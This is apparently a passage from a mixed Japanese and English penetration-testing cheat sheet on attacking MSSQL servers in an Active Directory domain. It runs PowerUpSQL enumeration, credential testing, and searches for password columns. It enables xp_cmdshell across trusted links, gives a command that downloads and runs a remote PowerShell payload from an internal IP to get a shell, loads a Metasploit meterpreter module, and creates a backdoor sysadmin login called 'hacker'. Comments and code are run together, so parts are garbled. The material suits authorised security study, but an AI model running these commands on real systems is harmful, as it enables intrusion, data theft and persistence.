# Get local MSSQL instance (if any)Get-SQLInstanceLocalGet-SQLInstanceLocal|Get-SQLServerInfo#If you don't have a AD account, you can try to find MSSQL scanning via UDP#First, you will need a list of hosts to scanGet-Content c:\temp\computers.txt |Get-SQLInstanceScanUDP –Verbose –Threads 10#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them#The discovered MSSQL servers must be on the file: C:\temp\instances.txtGet-SQLInstanceFile-FilePath C:\temp\instances.txt |Get-SQLConnectionTest-Verbose -Username test -Password test
ドメイン内からの列挙
# Get local MSSQL instance (if any)Get-SQLInstanceLocalGet-SQLInstanceLocal|Get-SQLServerInfo#Get info about valid MSQL instances running in domain#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)Get-SQLInstanceDomain|Get-SQLServerinfo-Verbose#Test connections with each oneGet-SQLInstanceDomain|Get-SQLConnectionTestThreaded-verbose#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)Get-SQLInstanceDomain|Get-SQLServerInfo-Verbose# Get DBs, test connections and get info in onelinerGet-SQLInstanceDomain|Get-SQLConnectionTest|? { $_.Status-eq"Accessible" } |Get-SQLServerInfo
MSSQL 基本的な悪用
アクセス DB
#Perform a SQL queryGet-SQLQuery-Instance "sql.domain.io,1433"-Query "select @@servername"#Dump an instance (a lotof CVSs generated in current dir)Invoke-SQLDumpInfo-Verbose -Instance "dcorp-mssql"# Search keywords in columns trying to access the MSSQL DBs## This won't use trusted SQL linksGet-SQLInstanceDomain|Get-SQLConnectionTest|? { $_.Status-eq"Accessible" } |Get-SQLColumnSampleDataThreaded-Keywords "password"-SampleSize 5| select instance, database, column, sample | ft -autosize
MSSQL RCE
MSSQLホスト内でコマンドを実行することも可能かもしれません。
Invoke-SQLOSCmd-Instance "srv.sub.domain.local,1433"-Command "whoami"-RawResults# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
Check in the page mentioned in the following section how to do this manually.
#Look for MSSQL links of an accessible instanceGet-SQLServerLink-Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)Get-SQLServerLinkCrawl-Instance mssql-srv.domain.local -Verbose#If you are sysadmin in some trusted link you can enable xp_cmdshell with:Get-SQLServerLinkCrawl-instance "<INSTANCE1>"-verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery fieldGet-SQLServerLinkCrawl-Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"#Obtain a shellGet-SQLServerLinkCrawl-Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'#Check for possible vulnerabilities on an instance where you have accessInvoke-SQLAudit-Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"#Try to escalate privileges on an instanceInvoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"#Manual trusted link queeryGet-SQLQuery-Instance "sql.domain.io,1433"-Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"## Enable xp_cmdshell and check itGet-SQLQuery-Instance "sql.domain.io,1433"-Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'Get-SQLQuery-Instance "sql.domain.io,1433"-Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'Get-SQLQuery-Instance "sql.domain.io,1433"-Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'## If you see the results of @@selectname, it workedGet-SQLQuery-Instance "sql.rto.local,1433"-Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
Metasploit
metasploitを使用して、信頼されたリンクを簡単に確認できます。
#Set username, password, windows auth (if using AD), IP...msf> useexploit/windows/mssql/mssql_linkcrawler[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
If you cannot perform actions like exec xp_cmdshell from openquery() try with the EXECUTE method.
Manual - EXECUTE
信頼されたリンクを使用して EXECUTE を悪用することもできます:
#Create user and give admin privilegesEXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"